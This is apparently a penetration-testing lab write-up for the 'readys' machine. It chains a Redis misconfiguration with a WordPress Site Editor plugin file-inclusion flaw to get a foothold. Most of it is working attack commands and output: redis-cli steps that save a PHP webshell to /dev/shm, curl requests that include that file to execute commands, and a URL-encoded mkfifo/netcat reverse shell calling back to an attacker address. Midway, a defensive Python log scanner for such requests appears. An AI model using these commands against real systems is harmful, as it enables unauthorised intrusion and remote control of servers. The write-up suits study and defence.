RCE via Redis and LFI


Given that an LFI vulnerability is present in the target WordPress instance, code execution can be achieved by using the target Redis instance to write a malicious PHP file anywhere on the target system where the Redis process has write access. Because the LFI vulnerability allows arbitrary file inclusion, that PHP file can then be included and executed through it, giving remote code execution. This removes the need to write directly into the web directory, which widens the set of usable drop locations and increases the potential for system compromise.

Web Root Directory (Fail)


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' CONFIG SET dir /var/www/html
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' CONFIG SET dbfilename webshell.php
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ cat webshell.php | redis-cli -h $IP --pass 'Ready4Redis?' -x SET webshell           
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' SAVE                           
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
(error) ERR

The initial attempt to write to the web root directory failed: SAVE returned an error, most likely because the Redis process does not have write access to /var/www/html.

World-writable /dev/shm


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' FLUSHALL
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK

Clearing the previous attempt

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' CONFIG SET dir /dev/shm
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' CONFIG SET dbfilename webshell.php
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ cat webshell.php | redis-cli -h $IP --pass 'Ready4Redis?' -x SET webshell
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ redis-cli -h $IP --pass 'Ready4Redis?' SAVE
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
OK

Pointing the dir attribute at the world-writable /dev/shm directory. With dbfilename set to webshell.php, SAVE now succeeds and the RDB snapshot containing the webshell key is written to /dev/shm/webshell.php.

LFI


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ curl --output - "http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/dev/shm/webshell.php&cmd=id"
REDIS0009�	redis-ver5.0.14�
�edis-bits�@�ctime�e��gused-mem°
 aof-preamble��webshelluid=1000(alice) gid=1000(alice) groups=1000(alice)
����R�(��{"success":true,"data":{"output":[]}}

Code execution confirmed: the output of id appears in the middle of the binary RDB dump because PHP emits the bytes surrounding the <?php block as literal output and executes only the embedded code.
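On the web side, the include parameter carrying an absolute path into /dev/shm is the detectable signal. The following log scanner, added here and not part of the original write-up, flags query parameters that hold absolute system paths, directory traversal or PHP stream wrappers; the log lines are constructed in combined log format and the client addresses are placeholders.

```python
"""Flag requests whose query parameters look like file-inclusion attempts,
such as ajax_path=/dev/shm/webshell.php above. Added example, not from the write-up."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: client, timestamp, request line, status (constructed samples below)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})')

# Values a legitimate include parameter should never carry
SUSPICIOUS_VALUE = re.compile(r"(^/(dev|tmp|proc|etc|var)/|(^|/)\.\./|^(php|data|expect)://)")

LFI_PATH = "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"
SAMPLE_LOG = [  # constructed sample lines
    f'192.0.2.10 - - [10/Jan/2024:10:00:00 +0000] "GET {LFI_PATH}?ajax_path=/dev/shm/webshell.php&cmd=id HTTP/1.1" 200 512',
    '192.0.2.20 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?p=1 HTTP/1.1" 200 4096',
    f'192.0.2.11 - - [10/Jan/2024:10:00:02 +0000] "GET {LFI_PATH}?ajax_path=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 100',
]


def suspicious_params(url: str):
    """Return (name, decoded value) for every query parameter matching SUSPICIOUS_VALUE."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; decode again to catch double encoding
        if SUSPICIOUS_VALUE.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Return (ip, timestamp, url, hits) for each parseable line with a suspicious parameter."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m["url"])
        if hits:
            alerts.append((m["ip"], m["ts"], m["url"], hits))
    return alerts


if __name__ == "__main__":
    for ip, ts, url, hits in scan_log(SAMPLE_LOG):
        print(f"[!] {ts} {ip} {hits} in {url}")
```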

Shell


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ curl --output - "http://$IP/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/dev/shm/webshell.php&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%20192.168.45.218%209999%20%3E%2Ftmp%2Ff"

Sending a URL-encoded reverse shell command through the cmd parameter

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nnc 9999       
listening on [any] 9999 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.166] 33194
bash: cannot set terminal process group (526): Inappropriate ioctl for device
bash: no job control in this shell
<ite-editor/editor/extensions/pagebuilder/includes$ whoami
whoami
alice
<ite-editor/editor/extensions/pagebuilder/includes$ hostname
hostname
readys
<ite-editor/editor/extensions/pagebuilder/includes$ ifconfig
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.154.166  netmask 255.255.255.0  broadcast 192.168.154.255
        inet6 fe80::250:56ff:fe9e:6e4b  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:9e:6e:4b  txqueuelen 1000  (Ethernet)
        RX packets 856  bytes 85629 (83.6 KiB)
        RX errors 0  dropped 60  overruns 0  frame 0
        TX packets 211  bytes 22052 (21.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial foothold established on the target system as the alice user by leveraging Redis and LFI. Moving on to lateral movement.